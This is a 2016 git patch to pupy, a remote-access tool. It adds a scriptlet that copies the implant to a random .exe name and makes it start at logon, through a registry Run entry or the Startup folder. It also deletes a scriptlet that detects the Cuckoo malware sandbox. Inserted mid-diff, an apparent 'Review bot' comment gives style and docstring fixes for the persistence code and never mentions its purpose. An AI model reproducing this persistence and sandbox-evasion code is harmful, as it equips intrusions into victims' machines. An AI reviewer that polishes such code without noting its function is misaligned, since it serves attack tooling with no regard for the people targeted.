From ce784a9469ba53f092120270950005523012179e Mon Sep 17 00:00:00 2001
From: n1nj4sec
Date: Wed, 4 May 2016 01:05:18 +0200
Subject: [PATCH] improved persistence scriptlet

---
 .gitignore                                   |  1 +
 pupy/scriptlets/detect_cuckoo.py             | 18 --------
 .../__init__.py                              |  0
 pupy/scriptlets/persistence/generator.py     | 39 +++++++++++++++++++
 pupy/scriptlets/reg_persistence/generator.py | 23 -----------
 5 files changed, 40 insertions(+), 41 deletions(-)
 delete mode 100644 pupy/scriptlets/detect_cuckoo.py
 rename pupy/scriptlets/{reg_persistence => persistence}/__init__.py (100%)
 create mode 100644 pupy/scriptlets/persistence/generator.py
 delete mode 100644 pupy/scriptlets/reg_persistence/generator.py

diff --git a/.gitignore b/.gitignore
index 1709a1e3..4641232b 100644
--- a/.gitignore
+++ b/.gitignore
@@ -37,6 +37,7 @@ pupy/modules/*.py[cod]
 pupy/modules/lib/*.py[cod]
 pupy/modules/lib/**/*.py[cod]
 pupy/network/**/*.pyc
+pupy/scriptlets/**/*.pyc
 
 # do not ignore package & templates files
 !pupy/packages/
diff --git a/pupy/scriptlets/detect_cuckoo.py b/pupy/scriptlets/detect_cuckoo.py
deleted file mode 100644
index 7e68579d..00000000
--- a/pupy/scriptlets/detect_cuckoo.py
+++ /dev/null
@@ -1,18 +0,0 @@
-#!/usr/bin/env python
-# -*- coding: UTF8 -*-
-# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
-# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
-
-
-import subprocess
-import re
-try:
-    info = subprocess.STARTUPINFO()
-    info.dwFlags = subprocess.STARTF_USESHOWWINDOW|subprocess.CREATE_NEW_PROCESS_GROUP
-    info.wShowWindow = subprocess.SW_HIDE
-    res=subprocess.Popen(["wmic.exe", "process" ,"get", "/FORMAT:LIST"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, startupinfo=info)
-    if re.search("CommandLine\\s*=\\s*C:\\\\Python27\\\\pythonw.exe\\s+C:\\\\[a-zA-Z0-9]+\\\\analyzer.py",res):
-        exit()
-except Exception:
-    pass
-
diff --git a/pupy/scriptlets/reg_persistence/__init__.py b/pupy/scriptlets/persistence/__init__.py
similarity index 100%
rename from pupy/scriptlets/reg_persistence/__init__.py
rename to pupy/scriptlets/persistence/__init__.py
diff --git a/pupy/scriptlets/persistence/generator.py b/pupy/scriptlets/persistence/generator.py
new file mode 100644
index 00000000..3bc19c78
--- /dev/null
+++ b/pupy/scriptlets/persistence/generator.py
@@ -0,0 +1,39 @@
+#!/usr/bin/env python
+# -*- coding: UTF8 -*-
+# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
+# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
+import textwrap, random, string
+from scriptlets import *
+
+class ScriptletGenerator(Scriptlet):
+    """ copy the current pupy executable to a random exe in %TEMP% and add persistency through registry """
+
+    dependencies=[("windows/all/pupwinutils/persistence.py","pupwinutils.persistence")]
+    arguments={
+        'method': 'available methods: registry, startup'
+    }
+
+    def __init__(self, method="registry"):
+        if not method in ("registry", "startup"):
+            raise ScriptletArgumentError("unknown persistence method %s"%method)
+        self.method=method
+
+    def generate(self):
+        name=''.join(random.choice(string.ascii_lowercase) for _ in range(0,7))+".exe"
+        if self.method=="registry":
+            return textwrap.dedent("""
+            import sys, shutil, os.path
+            if sys.platform=="win32":
+                import pupwinutils.persistence
+                path=os.path.join(os.path.expandvars("%TEMP%"), {})
+                shutil.copy(sys.executable, path)
+                pupwinutils.persistence.add_registry_startup(path)
+            """.format(name))
+        else:
+            return textwrap.dedent("""
+            import sys, shutil, os.path
+            if sys.platform=="win32":
+                shutil.copy(sys.executable, os.path.expandvars("%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\{}"))
+            """.format(name))
+
+
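Review bot: The class docstring on ScriptletGenerator still says "add persistency through registry", but `__init__` now also accepts `method="startup"` and `generate` returns a different snippet for it, so the documentation no longer matches the class it describes. I'd rewrite it as `"""Copy the current pupy executable under a random .exe name and register it via the selected method ('registry' or 'startup')."""` and have the `arguments` help string name the default, `'method': 'available methods: registry (default), startup'`. The validation line `if not method in ("registry", "startup"):` is the non-idiomatic form; `if method not in ("registry", "startup"):` reads as intended. `Scriptlet` and `ScriptletArgumentError` both arrive through `from scriptlets import *`; importing them by name would make the module's dependencies visible to a reader.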
diff --git a/pupy/scriptlets/reg_persistence/generator.py b/pupy/scriptlets/reg_persistence/generator.py
deleted file mode 100644
index abf35c2a..00000000
--- a/pupy/scriptlets/reg_persistence/generator.py
+++ /dev/null
@@ -1,23 +0,0 @@
-#!/usr/bin/env python
-# -*- coding: UTF8 -*-
-# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
-# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
-import textwrap, random
-from scriptlets import *
-
-class ScriptletGenerator(Scriptlet):
-    """ copy the current pupy executable to a random exe in %TEMP% and add persistency through registry """
-    dependencies=[("windows/all/pupwinutils/persistence.py","pupwinutils.persistence")]
-    def generate(self):
-        return textwrap.dedent("""
-        import sys, shutil, os.path, random, string
-        if sys.platform=="win32":
-            import pupwinutils.persistence
-            random.seed({})
-            name=''.join(random.choice(string.ascii_lowercase) for _ in range(0,7))+".exe"
-            path=os.path.join(os.path.expandvars("%TEMP%"), name)
-            shutil.copy(sys.executable, path)
-            pupwinutils.persistence.add_registry_startup(path)
-        """.format(int(random.getrandbits(32))))
-
-